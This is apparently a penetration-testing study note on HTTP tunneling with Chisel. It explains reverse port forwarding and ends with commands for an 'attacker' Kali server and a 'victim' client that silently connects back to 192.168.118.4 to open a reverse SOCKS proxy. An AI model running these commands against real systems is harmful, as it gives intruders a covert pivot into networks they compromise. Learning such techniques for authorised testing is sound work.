HTTP Tunneling with Chisel

Chisel uses a client/server model. A Chisel server must be set up, which can accept a connection from the Chisel client. Various port forwarding options are available depending on the server and client configurations. One option that is particularly useful for us is reverse port forwarding, which is similar to SSH remote port forwarding.

Chisel can run on macOS, Linux, and Windows, and on various architectures on each. Older tools like HTTPTunnel offer similar tunneling functionality, but lack the flexibility and cross-platform capabilities of Chisel.

Chisel binary on both our Kali machine and the target, we can run them. On the Kali machine, we'll start the binary as a server with the server subcommand, along with the bind port (--port) and the --reverse flag to allow the reverse port forward.

#From Attacker Machine
chisel server --port 8080 --reverse

#In Victim Machine
/tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 &